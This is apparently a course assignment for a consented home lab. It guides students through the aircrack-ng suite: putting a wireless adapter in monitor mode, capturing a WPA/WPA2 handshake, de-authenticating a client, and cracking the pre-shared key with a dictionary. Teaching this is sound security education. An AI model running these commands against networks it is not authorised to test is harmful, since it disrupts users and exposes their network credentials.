Notes:

(1) Equipment: You need to have administrative privilege, or be given consent to administrative privilege, to a computer/laptop (the pen-tester or attacker machine), a Wifi router (access point) running the WPA/WPA2-PSK security protocol, and another Windows machine as the target/victim machine, all connected in a wireless LAN environment.

(2) Tools: You need to run Linux on the pen-tester machine (such as Kali Linux). Specific tools of Kali Linux to be used include (but not limited to): Aircrack-ng suite, Metaspolit, nmap, etc. You may download Kali Linux and make a bootable USB drive to run Kali Linux on your computer/laptop (see instructions athttps://docs.kali.org/downloading/kali-linux-live-usb-install for details). Alternatively, you may install Virtualbox on your computer/laptop (https://www.virtualbox.org/manual/ch01.html) and run Kali Linux as a virtual machine (https://www.blackmoreops.com/2014/04/08/detailed-guide-installing-kali- linux-on-virtualbox/). In the case of running Kali Linux as a virtual machine, sinceKali Linux may not be able to see your host machines wireless interface card, youwill/may need to add a Wifi adapter USB dongle in order for the VM to have wireless connection (see https://www.youtube.com/watch?v=K1ETBeRQBs4 for details on purchasing a Kali Linux compatible Wifi USB adapter, setting up Wireless connection, in the VM). In sum, the pen-tester machine could be: an Intel- based machine booted into Kali Linux, Kali Linux running as a virtual machine on a host computer/laptop, or a Linux machine that have installed the necessary tools (aircrack-ng, metasploit, etc.) for the assignment. In all cases, your pen- tester/attacker machine needs to have wireless access while running Linux.

(3) As always, be sure to include adequate explanations and details in your answers to each of the questions (or, otherwise, points will be deducted if there is insufficient/inadequate amount of explanation/details in your submitted work).

1. (8 pts.) In this question the attacker/pen-tester machine attempts to capture WPA/WPA2 4- way handshake packets between an AP and a victim/target machine by first de-authenticating the victim from the AP, then conducting a brute-force dictionary attack of the packet capture file to crack the pre-shared key of the WLAN. The main tools used are part of the aircrack-ng suite (preinstalled in Kali Linux), using the examples described at https://www.aircrack- ng.org/doku.php?id=deauthentication#usage_examples and https://www.aircrack- ng.org/doku.php?id=cracking_wpa as a guide. You need to follow the below steps and describe your work/results (including screenshots) using your words in each of the steps:Note: To balance documentations of your work and, at the same time, protecting your privacy, please do not include model/serial numbers in your answers or screenshots, and, for MAC addresses (6 bytes), report only the first 2 bytes and blank out (redact) the last 4 bytes (out of the 6 bytes); for SSIDs, blank out (redact) all leading characters except for the last character of the SSID.

(a) Describe briefly the equipment you use for this question, including: the pen-tester and target machines (e.g., a Dell laptop running Kali Linux VM in Virtualbox, and a Dell desktop PC, respectively) and the AP (e.g., an IEEE 802.11n Wireless router/DSL modem made by Zyxel). Additionally, include a statement whether you have the administrative privilege, or are given the consent, to conduct penetration testing using the equipment described here.

(b) In Kali Linux, open a terminal and use the command ifconfig a to make sure yourpen-tester/attacker machine sees the wireless interface wlan0 is up. Produce a screenshot showing the wlan0 interface and the current time when you did this work (using thedate command to show current date/time).

(c) Logon to your wireless router/access point and change its current password/phrase to something different but equally strong (with adequate length and combinations of characters). Report what you did (but do not report your APs old password/phrase), when you made the change (e.g., 05:10 pm on 11/18/2018), and the new password/phrase. After completing Question 1, be sure to restore the APs password/phrase to its original.

(d) After you changed the APs password/phrase, reconnect your target/victim machine to the AP using the new password/phrase. Do not reconnect your pen-tester/attacker machine to the AP using the new password/phrase. In Kali Linux, open a terminal, run the below commands, respectively, to: put the pen-tester machines wireless interface in monitor mode; and identify the AP and connected target/victim device. Report what you did, when you did this, and relevant screenshots (Be sure to blank out/redact) portions of the MAC addresses, SSIDs, etc., as noted above, in your screenshots): airmon-ng start wlan0 (to put the pen-testers wireless adapter in monitor mode)airodump-ng wlan0mon (to identify your AP's MAC address, the channel number used,and the target devices MAC address)

(e) Once you identified your APs channel (e.g., 11), run the below command to capture wireless packets on that channel and write/save them to a file. Report your work, time, and relevant screenshot(s):

airodump-ng -c 11 --bssid xx:xx:xx:xx:xx:xx -w out wlan0mon (to start capturing wireless packets on channel 11 (replace 11 with your APs channel), APs MAC address of 6 bytes separated by the colon : symbol (replace XXs with your APs MAC address), save packets to the file out in the current directory (e.g., under /root); therewill be several files saved starting their names with out.

(f) Open a new terminal in Kali (while keeping the terminal of the previous part intact), run the below aireplay-ng command to de-authenticate the target/victim machine, and wait for the command airodump-ng of the previous part captures the WPA/WPA2 4-way handshake packets between the AP and the target/victim machine:

aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy wlan0mon

-0 means de-authentication

1 is the number of de-authentications to send (you can send multiple if you wish)

-a xx:xx:xx:xx:xx:xx is to specify the APs MAC address

-c yy:yy:yy:yy:yy:yy is to specify the client (target/victim)s MAC address

Describe your work (procedure and steps), results, and relevant screenshot(s).

Wait for the airodump-ng terminal of Part (e) to show WPA Handshake has been captured (a message displayed in its upper right corner). Take a screenshot, then type CTRL-C to terminate airodump-ng( started in Step (e). Use the command ls l to listthe capture file(s) in the current directory. Describe your work, results, and relevant screenshot(s).

(g) Create a dictionary (wordlist) consisting of the current password/phrase for the AP, forexample, using the command echo zzzzz > dictionary replacing zzzzz with your APspassword/phrase will create a file named dictionary in the current dictionary consisting of a single word zzzz. Use the command cat dictionary to type out the files content.Describe your work, results, and relevant screenshot(s). Please note that in practice, the dictionary/wordlist would consist of many words that are presumably popular choices for a password/phrase, and that those APs using such common passwords/phrases will bepotential hacking victims.

(h) Use the aircrack-ng command shown below to crack the APs password/phrase:

aircrack-ng -w dictionary out*.cap.

Describe your work, results, and relevant screenshot(s).

(i) After successfully completing the above work, logon to your AP and restore the APs password/phrase to its original.